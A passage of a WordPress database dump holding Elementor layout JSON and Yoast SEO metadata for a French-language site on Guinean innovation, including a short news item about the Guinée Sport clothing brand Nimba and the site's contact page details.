,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2431,777,'_elementor_version','0.4'),(2433,603,'_elementor_edit_mode','builder'),(2434,603,'_elementor_data','[{\"id\":\"ektduot\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ztjkdwh\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"oqdpiml\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Guin\\u00e9e Sport est g\\u00e9r\\u00e9e par une dame qui entend faire de la marque Nimba une fiert\\u00e9 nationale. La nouvelle ligne de maillot a \\u00e9t\\u00e9 pr\\u00e9sent\\u00e9e aux Guin\\u00e9ens \\u00e0 la bluezone de Conakry.<\\/p><p>Apr\\u00e8s deux ans, Guin\\u00e9e Sport a enfin r\\u00e9ussi \\u00e0 pr\\u00e9senter sa marque de v\\u00eatements de sport. Cette jeune entreprise offre quinze emplois fixes. La nouvelle marque Nimba a \\u00e9t\\u00e9 pr\\u00e9sent\\u00e9e aux Guin\\u00e9ens \\u00e0 travers un d\\u00e9fil\\u00e9 et une exposition vente de maillots \\u00e0 Conakry.<\\/p><div><div class=\\\"wsw\\\"><p>Guin\\u00e9e Sport propose des maillots pour toutes les disciplines sportives et souhaite se faire accompagner par les autorit\\u00e9s sportives guin\\u00e9ennes.<\\/p><p>Avec ses sept machines \\u00e0 coudre, Guin\\u00e9e Sport a sign\\u00e9 avec trois clubs de football de premi\\u00e8re division, l\\u2019\\u00e9quipe nationale de handball et plusieurs \\u00e9quipes scolaires et universitaires de Guin\\u00e9e.<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9wrqrny\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"85cys9s\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"kxp87kg\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=4McQdO9Hwd0\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(2437,778,'_elementor_edit_mode','builder'),(2438,778,'_elementor_data','[{\"id\":\"ektduot\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ztjkdwh\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"oqdpiml\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Guin\\u00e9e Sport est g\\u00e9r\\u00e9e par une dame qui entend faire de la marque Nimba une fiert\\u00e9 nationale. La nouvelle ligne de maillot a \\u00e9t\\u00e9 pr\\u00e9sent\\u00e9e aux Guin\\u00e9ens \\u00e0 la bluezone de Conakry.<\\/p><p>Apr\\u00e8s deux ans, Guin\\u00e9e Sport a enfin r\\u00e9ussi \\u00e0 pr\\u00e9senter sa marque de v\\u00eatements de sport. Cette jeune entreprise offre quinze emplois fixes. La nouvelle marque Nimba a \\u00e9t\\u00e9 pr\\u00e9sent\\u00e9e aux Guin\\u00e9ens \\u00e0 travers un d\\u00e9fil\\u00e9 et une exposition vente de maillots \\u00e0 Conakry.<\\/p><div><div class=\\\"wsw\\\"><p>Guin\\u00e9e Sport propose des maillots pour toutes les disciplines sportives et souhaite se faire accompagner par les autorit\\u00e9s sportives guin\\u00e9ennes.<\\/p><p>Avec ses sept machines \\u00e0 coudre, Guin\\u00e9e Sport a sign\\u00e9 avec trois clubs de football de premi\\u00e8re division, l\\u2019\\u00e9quipe nationale de handball et plusieurs \\u00e9quipes scolaires et universitaires de Guin\\u00e9e.<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2439,603,'_elementor_version','0.4'),(2443,416,'_yoast_wpseo_primary_category',''),(2444,416,'_yst_is_cornerstone','1'),(2445,416,'_yoast_wpseo_focuskw_text_input','Architecte Guinée'),(2446,416,'_yoast_wpseo_focuskw','Architecte Guinée'),(2447,416,'_yoast_wpseo_linkdex','20'),(2448,416,'_yoast_wpseo_content_score','30'),(2451,360,'_yst_is_cornerstone','1'),(2452,360,'_yoast_wpseo_focuskw_text_input','Innovations en Guinée'),(2453,360,'_yoast_wpseo_focuskw','Innovations en Guinée'),(2454,360,'_yoast_wpseo_title','Guinée innovations'),(2455,360,'_yoast_wpseo_metadesc','Informations sur les innovations les plus pertinentes de la Guinée Conakry.'),(2456,360,'_yoast_wpseo_linkdex','15'),(2457,360,'_yoast_wpseo_content_score','60'),(2458,378,'_yoast_wpseo_title','Guinée innovations'),(2459,378,'_yoast_wpseo_metadesc','Toutes les innovations de la Guinée dans le domaine agricole.'),(2460,378,'_yoast_wpseo_content_score','30'),(2461,385,'_yst_is_cornerstone','1'),(2462,385,'_yoast_wpseo_focuskw_text_input','Culture de la Guinée'),(2463,385,'_yoast_wpseo_focuskw','Culture de la Guinée'),(2464,385,'_yoast_wpseo_title','Guinée innovations'),(2465,385,'_yoast_wpseo_metadesc','Toutes les innovations de la Guinée dans le domaine culturel.'),(2466,385,'_yoast_wpseo_linkdex','8'),(2467,385,'_yoast_wpseo_content_score','30'),(2468,380,'_yst_is_cornerstone','1'),(2469,380,'_yoast_wpseo_focuskw_text_input','Innovations en Guinée'),(2470,380,'_yoast_wpseo_focuskw','Innovations en Guinée'),(2471,380,'_yoast_wpseo_title','Guinée innovations'),(2472,380,'_yoast_wpseo_metadesc','Toutes les innovations Economiques de la Guinée.'),(2473,380,'_yoast_wpseo_linkdex','4'),(2474,380,'_yoast_wpseo_content_score','30'),(2475,780,'_elementor_edit_mode','builder'),(2476,780,'_elementor_data','[{\"id\":\"gxjwvcb\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"otnhjxz\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"section_background_overlay\":\"\"},\"elements\":[{\"id\":\"rjicyqi\",\"elType\":\"widget\",\"settings\":{\"section_map\":\"\",\"address\":\"kaloum, Conakry\",\"height\":{\"unit\":\"px\",\"size\":\"450\"},\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"azpxljo\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"bwdywrb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"39.982\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"section_background_overlay\":\"\"},\"elements\":[{\"id\":\"rczmttr\",\"elType\":\"widget\",\"settings\":{\"section_magzma_contact_form_general_control\":\"\",\"form_select\":\"4\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-contact-form\"}],\"isInner\":false},{\"id\":\"zgqebrx\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"60.018\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"50\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"section_background_overlay\":\"\"},\"elements\":[{\"id\":\"dwgbkxq\",\"elType\":\"widget\",\"settings\":{\"section_title\":\"\",\"html\":\"<p style=\\\"font-size: 16px; color: #999999;\\\">In case you some questions popped in your mind, Feel free to call, email or even visit us. Also you can write us about whatever you want down below.\\u00a0Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut suscipit odio ante, id dapibus elit condimentum vitae. Maecenas eget orci vitae enim accumsan mollis. In congue nunc velit, sit amet eleifend velit cursus vitae.<\\/p>\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Telephone :<\\/strong> +0028 55 67 67<\\/p>\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Email :<\\/strong> jennier_aster@yourdomain.com<\\/p>\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Address :<\\/strong> 590 Tahoe Keys Blvd Lake Tahoe, CA 96150 - United States<\\/p>\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"html\"}],\"isInner\":false}],\"isInner\":false}]'),(2477,780,'_elementor_version','0.4'),(2478,780,'_elementor_css','a:3:{s:4:\"time\";i:1508775575;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2479,781,'_elementor_edit_mode','builder'),(2480,781,'_elementor_data','[{\"id\":\"gxjwvcb\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"otnhjxz\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"section_background_overlay\":\"\"},\"elements\":[{\"id\":\"rjicyqi\",\"elType\":\"widget\",\"settings\":{\"section_map\":\"\",\"address\":\"kaloum, Conakry\",\"height\":{\"unit\":\"px\",\"size\":\"450\"},\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"azpxljo\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"bwdywrb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"39.982\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"section_background_overlay\":\"\"},\"elements\":[{\"id\":\"rczmttr\",\"elType\":\"widget\",\"settings\":{\"section_magzma_contact_form_general_control\":\"\",\"form_select\":\"4\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-contact-form\"}],\"isInner\":false},{\"id\":\"zgqebrx\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"60.018\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"50\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"section_background_overlay\":\"\"},\"elements\":[{\"id\":\"dwgbkxq\",\"elType\":\"widget\",\"settings\":{\"section_title\":\"\",\"html\":\"<p style=\\\"font-size: 16p\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Telephone :<\\/strong> +224 625 27 22 90<\\/p>\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Email :<\\/strong> fmbangoura7@gmail.com<\\/p>\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Addresse :<\\/strong> Koul\\u00e9wondy Kaloum<\\/p>\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"html\"}],\"isInner\":false}],\"isInner\":false}]'),(2481,781,'_elementor_version','0.4'),(2483,538,'_yst_is_cornerstone','1'),(2484,538,'_yoast_wpseo_focuskw_text_input','Guinée innovations'),(2485,538,'_yoast_wpseo_focuskw','Guinée innovations'),(2486,538,'_yoast_wpseo_title','Guinée innovations'),(2487,538,'_yoast_wpseo_metadesc','Toutes les innovations de la Guinée en un seul endroit.'),(2488,538,'_yoast_wpseo_linkdex','6'),(2489,538,'_yoast_wpseo_content_score','30'),(2490,383,'_yoast_wpseo_focuskw_text_input','Innovations en Guinée'),(2491,383,'_yoast_wpseo_focuskw','Innovations en Guinée'),(2492,383,'_yoast_wpseo_title','Guinée innovations'),(2493,383,'_yoast_wpseo_metadesc','Toutes les innovations de la Guinée dans le domaine de la santé.'),(2494,383,'_yoast_wpseo_linkdex','10'),(2495,383,'_yoast_wpseo_content_score','30'),(2496,359,'_yst_is_cornerstone','1'),(2497,359,'_yoast_wpseo_focuskw_text_input','Guinée innovations'),(2498,359,'_yoast_wpseo_focuskw','Guinée innovations'),(2499,359,'_yoast_wpseo_title','Guinée innovations'),(2500,359,'_yoast_wpseo_metadesc','Toutes les innovations des Guinéens en un seul endroit.'),(2501,359,'_yoast_wpseo_linkdex','2'),(2502,359,'_yoast_wpseo_content_score','30'),(2503,526,'_yst_is_cornerstone','1'),(2504,526,'_yoast_wpseo_focuskw_text_input','Innovations en Guinée'),(2505,526,'_yoast_wpseo_focuskw','Innovations en Guinée'),(2506,526,'_yoast_wpseo_metadesc','Toutes les innovations de la Guinée dans le domaine du sport.'),(2507,526,'_yoast_wpseo_content_score','30'),(2512,662,'_yoast_wpseo_primary_category',''),(2513,662,'_yoast_wpseo_focuskw_text_input','Santé Afrique'),(2514,662,'_yoast_wpseo_focuskw','Santé 